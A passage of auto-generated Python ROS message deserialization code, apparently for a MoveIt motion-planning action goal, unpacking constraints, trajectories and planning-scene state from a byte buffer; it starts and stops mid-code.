(_v183.seq,) = _get_struct_I().unpack(str[start:end]) _v184 = _v183.stamp _x = _v184 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v183.frame_id = str[start:end].decode('utf-8') else: _v183.frame_id = str[start:end] _v185 = _v182.pose _v186 = _v185.position _x = _v186 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v187 = _v185.orientation _x = _v187 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v188 = val2.sensor_pose _v189 = _v188.header start = end end += 4 (_v189.seq,) = _get_struct_I().unpack(str[start:end]) _v190 = _v189.stamp _x = _v190 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v189.frame_id = str[start:end].decode('utf-8') else: _v189.frame_id = str[start:end] _v191 = _v188.pose _v192 = _v191.position _x = _v192 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v193 = _v191.orientation _x = _v193 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.goal_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.path_constraints.name = str[start:end].decode('utf-8') else: self.goal.request.path_constraints.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.joint_name = str[start:end].decode('utf-8') else: val1.joint_name = str[start:end] _x = val1 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.position_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.PositionConstraint() _v194 = val1.header start = end end += 4 (_v194.seq,) = _get_struct_I().unpack(str[start:end]) _v195 = _v194.stamp _x = _v195 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v194.frame_id = str[start:end].decode('utf-8') else: _v194.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v196 = val1.target_point_offset _x = _v196 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v197 = val1.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = struct.unpack(pattern, str[start:end]) _v197.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v198 = val3.position _x = _v198 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v199 = val3.orientation _x = _v199 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v197.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = _get_struct_3I().unpack(str[start:end]) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v197.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v200 = val3.position _x = _v200 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v201 = val3.orientation _x = _v201 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v197.mesh_poses.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.path_constraints.position_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.OrientationConstraint() _v202 = val1.header start = end end += 4 (_v202.seq,) = _get_struct_I().unpack(str[start:end]) _v203 = _v202.stamp _x = _v203 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v202.frame_id = str[start:end].decode('utf-8') else: _v202.frame_id = str[start:end] _v204 = val1.orientation _x = _v204 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _x = val1 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val1.target_radius,) = _get_struct_d().unpack(str[start:end]) _v205 = val1.target_pose _v206 = _v205.header start = end end += 4 (_v206.seq,) = _get_struct_I().unpack(str[start:end]) _v207 = _v206.stamp _x = _v207 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v206.frame_id = str[start:end].decode('utf-8') else: _v206.frame_id = str[start:end] _v208 = _v205.pose _v209 = _v208.position _x = _v209 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v210 = _v208.orientation _x = _v210 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val1.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v211 = val1.sensor_pose _v212 = _v211.header start = end end += 4 (_v212.seq,) = _get_struct_I().unpack(str[start:end]) _v213 = _v212.stamp _x = _v213 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v212.frame_id = str[start:end].decode('utf-8') else: _v212.frame_id = str[start:end] _v214 = _v211.pose _v215 = _v214.position _x = _v215 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v216 = _v214.orientation _x = _v216 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val1 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.trajectory_constraints.constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v217 = val2.header start = end end += 4 (_v217.seq,) = _get_struct_I().unpack(str[start:end]) _v218 = _v217.stamp _x = _v218 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v217.frame_id = str[start:end].decode('utf-8') else: _v217.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v219 = val2.target_point_offset _x = _v219 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v220 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = struct.unpack(pattern, str[start:end]) _v220.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v221 = val4.position _x = _v221 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v222 = val4.orientation _x = _v222 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v220.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = _get_struct_3I().unpack(str[start:end]) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v220.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v223 = val4.position _x = _v223 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v224 = val4.orientation _x = _v224 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v220.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v225 = val2.header start = end end += 4 (_v225.seq,) = _get_struct_I().unpack(str[start:end]) _v226 = _v225.stamp _x = _v226 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v225.frame_id = str[start:end].decode('utf-8') else: _v225.frame_id = str[start:end] _v227 = val2.orientation _x = _v227 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v228 = val2.target_pose _v229 = _v228.header start = end end += 4 (_v229.seq,) = _get_struct_I().unpack(str[start:end]) _v230 = _v229.stamp _x = _v230 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v229.frame_id = str[start:end].decode('utf-8') else: _v229.frame_id = str[start:end] _v231 = _v228.pose _v232 = _v231.position _x = _v232 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v233 = _v231.orientation _x = _v233 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v234 = val2.sensor_pose _v235 = _v234.header start = end end += 4 (_v235.seq,) = _get_struct_I().unpack(str[start:end]) _v236 = _v235.stamp _x = _v236 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v235.frame_id = str[start:end].decode('utf-8') else: _v235.frame_id = str[start:end] _v237 = _v234.pose _v238 = _v237.position _x = _v238 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v239 = _v237.orientation _x = _v239 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.trajectory_constraints.constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.reference_trajectories = [] for i in range(0, length): val1 = moveit_msgs.msg.GenericTrajectory() _v240 = val1.header start = end end += 4 (_v240.seq,) = _get_struct_I().unpack(str[start:end]) _v241 = _v240.stamp _x = _v241 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v240.frame_id = str[start:end].decode('utf-8') else: _v240.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_trajectory = [] for i in range(0, length): val2 = trajectory_msgs.msg.JointTrajectory() _v242 = val2.header start = end end += 4 (_v242.seq,) = _get_struct_I().unpack(str[start:end]) _v243 = _v242.stamp _x = _v243 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v242.frame_id = str[start:end].decode('utf-8') else: _v242.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] val2.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = struct.unpack(pattern, str[start:end]) _v244 = val3.time_from_start _x = _v244 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.joint_trajectory.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.cartesian_trajectory = [] for i in range(0, length): val2 = moveit_msgs.msg.CartesianTrajectory() _v245 = val2.header start = end end += 4 (_v245.seq,) = _get_struct_I().unpack(str[start:end]) _v246 = _v245.stamp _x = _v246 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v245.frame_id = str[start:end].decode('utf-8') else: _v245.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.tracked_frame = str[start:end].decode('utf-8') else: val2.tracked_frame = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = moveit_msgs.msg.CartesianTrajectoryPoint() _v247 = val3.point _v248 = _v247.pose _v249 = _v248.position _x = _v249 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v250 = _v248.orientation _x = _v250 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v251 = _v247.velocity _v252 = _v251.linear _x = _v252 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v253 = _v251.angular _x = _v253 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v254 = _v247.acceleration _v255 = _v254.linear _x = _v255 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v256 = _v254.angular _x = _v256 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v257 = val3.time_from_start _x = _v257 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.cartesian_trajectory.append(val2) self.goal.request.reference_trajectories.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.planner_id = str[start:end].decode('utf-8') else: self.goal.request.planner_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.group_name = str[start:end].decode('utf-8') else: self.goal.request.group_name = str[start:end] _x = self start = end end += 28 (_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor,) = _get_struct_i3d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.name = str[start:end] _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort = struct.unpack(pattern, str[start:end]) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v258 = val1.translation _x = _v258 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v259 = val1.rotation _x = _v259 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v260 = val1.linear _x = _v260 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v261 = val1.angular _x = _v261 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v262 = val1.force _x = _v262 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v263 = val1.torque _x = _v263 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v264 = val1.object _v265 = _v264.header start = end end += 4 (_v265.seq,) = _get_struct_I().unpack(str[start:end]) _v266 = _v265.stamp _x = _v266 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v265.frame_id = str[start:end].decode('utf-8') else: _v265.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v264.id = str[start:end].decode('utf-8') else: _v264.id = str[start:end] _v267 = _v264.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v267.key = str[start:end].decode('utf-8') else: _v267.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v267.db = str[start:end].decode('utf-8') else: _v267.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = struct.unpack(pattern, str[start:end]) _v264.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v268 = val3.position _x = _v268 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v269 = val3.orientation _x = _v269 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = _get_struct_3I().unpack(str[start:end]) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v264.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v270 = val3.position _x = _v270 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v271 = val3.orientation _x = _v271 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = _get_struct_4d().unpack(str[start:end]) _v264.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v272 = val3.position _x = _v272 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v273 = val3.orientation _x = _v273 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v264.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v264.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v274 = val3.position _x = _v274 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v275 = val3.orientation _x = _v275 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v264.subframe_poses.append(val3) start = end end += 1 (_v264.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v276 = val1.detach_posture _v277 = _v276.header start = end end += 4 (_v277.seq,) = _get_struct_I().unpack(str[start:end]) _v278 = _v277.stamp _x = _v278 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v277.frame_id = str[start:end].decode('utf-8') else: _v277.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v276.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v276.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v276.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = 